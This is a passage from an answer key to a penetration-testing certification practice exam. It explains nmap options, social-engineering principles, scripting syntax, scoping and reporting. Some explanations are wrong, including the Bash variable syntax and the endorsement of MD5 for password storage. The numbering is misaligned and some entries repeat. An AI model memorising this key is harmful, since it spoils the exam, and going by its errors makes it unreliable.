A and B. In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.

Answer 221

A

A. Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 222

A

B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.

Answer 223

A

C. The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Answer 224

A

A. This is an example of risk avoidance. By removing the door and filling in the wall with concrete, the client has completely removed the risk of the door being used by an attacker to gain unauthorized access to the facility.

Answer 225

A

D. A malicious insider attack occurs when someone within the organization uses the credentials they have been legitimately given to carry out an attack. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.

Answer 226

A

A. The whois tool can be used to gather information about domain ownership from public records. In the example shown in this question, you can learn who the registrar is for the domain, the name of the organization that owns it, the address of the organization, the phone number of the organization, the name of the employee that manages the domain, and that employee’s email address.

Answer 227

A

D. The penetration tester is using scarcity as a motivating factor. By asserting that there are only a small number of devices available at the steeply discounted price, the employees are motivated to make a purchase before supplies run out.

Answer 228

A

C. A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.

Answer 229

A

E. To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network access to only authenticated users.

Answer 230

A

D. ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker’s Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.

Answer 231

A

A. An if/then flow control structure in Ruby uses the following syntax:
- if condition
- commands…
- else
- commands…
- end

Answer 232

A

E. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any web pages, applications, services, and tokens used on the network.

Answer 233

A

A or B. Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

Answer 234

A

A. The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.

Answer 235

A

C. In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.

Answer 236

A

C. Because the penetration tester has no knowledge of the target, a black box test takes the most time and money to conduct. In contrast, gray box and white box tests are usually must less expensive and take less time to conduct because the tester has some level of prior knowledge about the target.

Answer 237

A

C and E. Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Answer 238

A

B and D. Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to (“federated”) with a different Active Directory domain.

Answer 239

A

A and B. Both Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Answer 240

A

D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.

Answer 241

A

A. Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is “hijacking” clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking a button that appears to perform another function.

Answer 242

A

B. The declare –i TOTAL command will create the TOTAL variable and type it as integer.

Answer 243

A

D. Before conducting a penetration test, you must get written permission from the senior management of the client’s organization to start the test. It is not acceptable to get permission verbally or by email. It is also not acceptable to obtain permission from the IT staff.

Answer 244

A

D. The Common Attack Pattern, Enumeration and Classification (CAPEC) database is a community-developed resource that can be accessed at http://capec.mitre.org. The CAPEC database contains a catalog of commonly used cyber attack patterns.

Answer 245

A

D. Before conducting a penetration test, you must get written permission from the senior management of the target organization to perform the test. Getting permission verbally or via email is generally not acceptable. Getting permission from the IT staff is also generally not acceptable.

Answer 246

A

C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems. In this scenario, Brittany has altered the employee pay accounting system.

Answer 247

A

A. When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn’t running. Therefore, nothing is listening on its associated port.

Answer 248

A

B. Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.

Answer 249

A

A and B. The rules of engagement (ROE) should always include the timeline that testing will be conducted as well as a review of any laws, especially any that govern the client to ensure that you don’t break any. A list of other organizations that you have previously tested or a list of the client’s competition is not required to be included in the ROE document. A detailed map of the client’s network would not be needed for the ROE but may be needed for the penetration testing.

Answer 250

A

A and B. In this scenario, you are conducting a white box assessment. So, when requesting internal architectural diagrams as a part of testing, you should usually be supplied with documentation such as network diagrams and facility maps. You can use this information to help map out the network topology and to locate key infrastructure devices, such as switches, routers, and servers.

Answer 251

A

A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version information.

Answer 252

A

E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.

Answer 253

A

B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.

Answer 254

A

C. The default port used by the SSH service is 22. The SSH protocol is used to remotely manage systems using a command line interface. Unlike Telnet, SSH uses encryption to protect authentication credentials as well as the data being transmitted between the client and the server.

Answer 255

A

D. A statement of work (SOW) is an agreement that should be defined during the planning and scoping phase of a penetration test. It contains a working agreement between the penetration tester and the client that identifies specific techniques, tools, activities, deliverables, and schedules for the test. It may be used in conjunction with an existing master services agreement (MSA).

Answer 256

A

A. The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 257

A

C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.

Answer 258

A

B. In this example, the line that reads “250 2.1.5 Recipient OK” indicates that this is a valid email address within the target organization’s domain. Because this is a valid email address, you now know that the organization most likely uses an email naming convention of first_initial+lastname@company_name.com. Using this information, you could reference the organization’s executive bio web page and construct email addresses for all of its management team members.

Answer 259

A

B. Most decompilers produce assembly-level source code, not C++ code. For this information to be useful, you need extensive experience working with assembly language code. Typically, this will require you to hire a consultant with an extensive understanding of assembly programming.

Answer 260

A

D. To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd –l command followed by the name of the user.

Answer 261

A

D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.

Answer 262

A

C. The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.

Answer 263

A

D. It is vital to know which service set identifiers (SSIDs) belong to your target and which are invalid targets. Also, knowing which subnets or IP ranges are in scope is also important to avoid targeting the wrong network or going outside of the penetration test’s scope. Knowing the SSIDs that are in scope is critical when working in shared buildings. Penetrating the wrong network could cause legal or even criminal consequences.

Answer 264

A

A and B. Your first response to the client’s lack of best practices would to be to exploit the devices with default usernames and passwords later in your penetration test. Then, you should recommend that the client adopt better best practices in your final report.

Answer 265

A

D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.

Answer 266

A

A. Banner grabbing is the process of manually connecting to a device, such as a web server, using a utility such as a Telnet client or Ncat and using the information displayed to fingerprint the device.

Answer 267

A

B. When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

Answer 268

A

A. A discovery scan is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.

Answer 269

A

A. NBTSTAT identifies NetBIOS servers with an ID of <20>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).

Answer 270

A

A and B. Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won’t be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.

Answer 271

A

B. By masquerading as a fellow employee in great distress in this scenario, the penetration tester is using urgency to motivate the employee to give up his username and password. She may also be using likeability as a factor.

Answer 272

A

B. Computer-controlled manufacturing devices are examples of nontraditional systems. These devices are considered fragile because they are difficult to manage in the traditional sense and they are probably updated on an infrequent basis by the vendor. They may also have not been subjected to extensive security testing by the vendor.

Answer 273

A

A. A voice phishing attack (also called a vishing attack) leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.

Answer 274

A

B. In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.

Answer 275

A

D and E. VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can’t install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.

Answer 276

A

B. This is an example of session hijacking. The tester was able to exploit the session key (the cookie) to gain access to the user’s session. This type of exploit can be used for web applications where an HTTP cookie is used to maintain a session. Even though the site may have used TLS/SSL to encrypt authentication credentials, the session cookie is many times not encrypted. If it is captured, it allows the tester to hijack the user’s session.

Answer 277

A

D. The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.

Answer 278

A

B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic. Hping is popular because it allows you to create custom packets. Nmap is the most commonly used command-line vulnerability scanner and is a free, open-source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a tool that gathers information from public records about domain ownership. Aircrack-ng provides the ability to conduct replay and deauthentication attacks and to act as a fake access point.

Answer 279

A

A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 280

A

B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 281

A

B. The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.

Answer 282

A

A and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used elicitation techniques to gather sensitive information from employees.

Answer 283

A

C. The fact that the server’s administrator hasn’t renewed its security certificate indicates that they aren’t paying much attention to this server. This would make this system a ripe target for compromise because it is possible that there are other factors (such as updates) that the administrator has also neglected.

Answer 284

A

B. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter I in CIA stands for integrity, which seeks to prevent unauthorized modification of information or systems.

Answer 285

A

D. Knowing which SSIDs are in scope is critical when conducting a penetration test within a shared facility with many tenants. Compromising the wrong wireless network is illegal and could result in prosecution and/or a lawsuit.

Answer 286

A

C. The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Answer 287

A

A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 288

A

A and B. Alternatives to a SOW used by the U.S. federal government include a statement of objectives (SOO) and a performance work statement (PWS). Purchase orders and a noncompete agreements are not typically used as alternatives to a SOW.

Answer 289

A

C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.

Answer 290

A

D. Port 21 is for TCP and FTP and is used as a control port. Port 80 is for TCP and HTTP and is used for transferring web pages. Port 443 is used for TCP, HTTPS, and is HTTP over TLS/SSL and is for encrypted transmission.

In this scenario, all the ports that the penetration tester has discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan.

Answer 291

A

D. When conducting a white box penetration test, especially one that will target applications developed in-house, having the documentation for the SDK that was used to create the application can be very helpful. Data flow diagrams can also provide penetration testers with an understanding of how the target application communicates with other network services. Configuration files may contain account information, IP addresses, API keys, and possibly even passwords.

Answer 292

A

D. In this example, the output tells us that the email server responds to SMTP HELO commands. Useful information can sometimes be gleaned from an email server using HELO commands.

Answer 293

A

A. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The first D in DAD stands for disclosure, which refers to gaining unauthorized access to information or systems.

Answer 294

A

B. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain confidentiality of findings. If an attacker was to receive word of findings during a penetration test, they could use those to compromise your client’s system.

Answer 295

A

B. In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 296

A

E. The information gathered during a vulnerability scan can be categorized in many different ways. For example, it may be appropriate to categorize the information based on the operating system because different OSs have different inherent vulnerabilities. It may also be appropriate to categorize the information by the value of each associated asset. For example, vulnerabilities associated with a mission-critical database server would be of much higher value than the vulnerabilities associated with an end user’s desktop system. You could also categorize the scan results based on the number or severity of the vulnerabilities found.

Answer 297

A

C. The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.

Answer 298

A

D. When creating an associative array in a Ruby script, you use the following syntax: _array_name = {“element_name” => “value”} .

In this example, the line _Target = {“HostName” => “FS1”} assigns a value of FS1 to the element named HostName within the Target array.

Answer 299

A

C. The default port for the Telnet service is 23. Telnet is used to remotely manage a system using a command-line interface. Telnet is a very old and insecure protocol. All information transmitted between the Telnet server and client is sent unencrypted, including authentication information. By sniffing traffic going in and out of this host on port 23, you may be able to capture usernames and passwords.

Answer 300

A

B. The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.

Answer 301

A

B and C. In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.

Answer 302

A

B and E. The key to a successful whaling exploit is having detailed information about the leaders in the target organization. Useful information can often be gleaned from the organization’s website in the form of press releases and executive bios. This information can provide you with names, positions, and possibly even contact information.

Answer 303

A

C. This is an example of a default credentials attack. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These defaults are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.

Answer 304

A

D. Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation.

Answer 305

A

A. If the penetration tester finds a critical issue with the security of their client’s environment, they should not wait for the delivery of their final report. By leaving a critical vulnerability unaddressed, it may put the client at an unacceptable level of risk and result in a potential compromise. The tester should immediately notify management of the issue.

Answer 306

A

D. Maltego is a utility that penetration testers frequently use to organize the information they have gathered from OSINT sources. One of its key benefits is its ability to graphically display the information discovered and visually link it together.

Answer 307

A

A. The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Answer 308

A

B. When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 309

A

A. The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.

Answer 310

A

A. Fuzzing occurs when the tester sends random, unexpected information to an application’s inputs to see how it responds. For example, the tester could try to perform a buffer overflow exploit by sending overly large input that contains executable code. If the application doesn’t handle the malicious input properly, it may be possible for executable code to be stored in the RAM of the target system and for the attacker to then be able to execute it.

Answer 311

A

A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician, pretending to be an employee.

Answer 312

A

A. De-confliction refers to the communication between the client and the tester to determine whether the detected attacker is actually part of the physical security assessment. It may sometimes be necessary to create a “get out of jail free” card, which has emergency off-hours phone numbers of higher ranking officers within the company who are aware of the test and can confirm that the tester has the authority to conduct the tests requested.

Answer 313

A

B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.

Answer 314

A

A. The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 315

A

B. The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

Answer 316

A

A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 317

A

A. The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.

Answer 318

A

D. An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 319

A

A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Answer 320

A

A. The –T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.

Answer 321

A

A. Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.

Answer 322

A

C. After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called client acceptance.

Answer 323

A

A and C. Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Answer 324

A

A and B. Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offline-only attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.

Answer 325

A

B. This is an example of elicitation. By gaining the employees’ trust, the tester was able to elicit sensitive information from them about their employer.

Answer 326

A

B. The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Answer 327

A

A. In a black box penetration test, the tester has no prior knowledge of the target. Therefore, it best simulates what would happen during an attack from the outside. White-box and gray-box penetration tests allow the tester to have some degree of prior knowledge about the target.

Answer 328

A

C and E. The SMB protocol uses TCP ports 139 and 445. A system with these two ports open is most likely a Windows host running SMB or a Linux host running Samba (which is an open source implementation of the SMB service).

Answer 329

A

A. This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.

Answer 330

A

C. Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.

Answer 331

A

A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 332

A

D. SCADA manufacturing equipment tends to be much more fragile than traditional network assets, such as servers and routers. They tend to be difficult to manage, update, and protect from exploits. As such, they can also be susceptible to vulnerability scans and may go offline during the scanning process.

Answer 333

A

B. In a credential harvesting attack, a fake website that looks like a legitimate website is used to capture victims’ usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims’ information.

Answer 334

A

B. After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.

Answer 335

A

C. Credential brute forcing is the process of trying one password after another until you finally hit the right one. This may be executed against user accounts or against other security systems, such as a WPA2 wireless network that uses a preshared key.

Answer 336

A

A. The sslyze tool is a penetration testing tool that is commonly used to perform certificate inspection.

Answer 337

A

A. Confidentiality, integrity, and availability is known as the CIA triad. It is a model designed to guide policies for information security within an organization. Cybersecurity professionals use this model to describe the goals of information security. The CIA triad has three main characteristics of information that cybersecurity programs seek to protect:
- Confidentiality seeks to prevent unauthorized access to information or systems.
- Integrity seeks to prevent unauthorized modification of information or systems.
- Availability seeks to ensure that legitimate use of information and systems remains possible.

Answer 338

A

C. The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

Answer 339

A

A. The proper signing authority within the client’s organization is the only one person authorized to agree to the penetration test scope. Who this actually is will vary from organization to organization. Therefore, you need to verify that the person who signs the agreement is actually the appropriate signing authority for the organization. Don’t assume that a given individual is authorized based on their job title alone.

Answer 340

A

A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.

Answer 341

A

C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Answer 342

A

C and E. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- Nslookup tools help identify the IP addresses associated with an organization.
- Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
- Whois tools gather information from public records about domain ownership.

Answer 343

A

A. Static code analysis is conducted by analyzing an application’s source code. Obviously, this type of testing is usually performed only during a white box penetration test. Static code analysis does not involve actually running the program. Instead, it is focused on analyzing how the application is written.

Answer 344

A

C. The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

Answer 345

A

A. A company policy, also known as a corporate policy, is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm’s objectives, operations, and plans. It is created by the company’s board of directors. Corporate policy lays down the company’s response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company’s officers in achievement of its objectives. In this scenario, the corporate policy should be detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.

Answer 346

A

D. Whois is a widely used Internet record listing that identifies who owns a domain and how to get in contact with them. The Internet Corporation for Assigned Names and Numbers (ICANN) regulates domain name registration and ownership. Whois records have proven to be extremely helpful and have developed into an essential resource for maintaining the integrity of the domain name registration and website ownership process.

Answer 347

A

A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 348

A

A and D. Organized crime and nation-state threat actors typically have access to extensive financial resources and technical expertise. This many times allows them to develop their own custom exploits that aren’t used by anyone else.

Answer 349

A

C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems.

Answer 350

A

D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Answer 351

A

B. You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a face-to-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.

Answer 352

A

E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.

Answer 353

A

B. The Gramm-Leach-Bliley Act (GLBA) is also known as the Financial Modernization Act of 1999. It is a U.S. federal law that requires financial institutions to explain how they share and protect their customers’ private information.

Answer 354

A

D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

Answer 355

A

A and B. The penetration tester is using two motivation factors in this example. She is using urgency and social proof as motivating factors. Because it is a huge order, the employee probably feels a sense of urgency to comply. The penetration tester also employs social proof by mentioning the name of a familiar co-worker. This probably helps the employee feel more comfortable with giving the penetration tester his username and password.

Answer 356

A

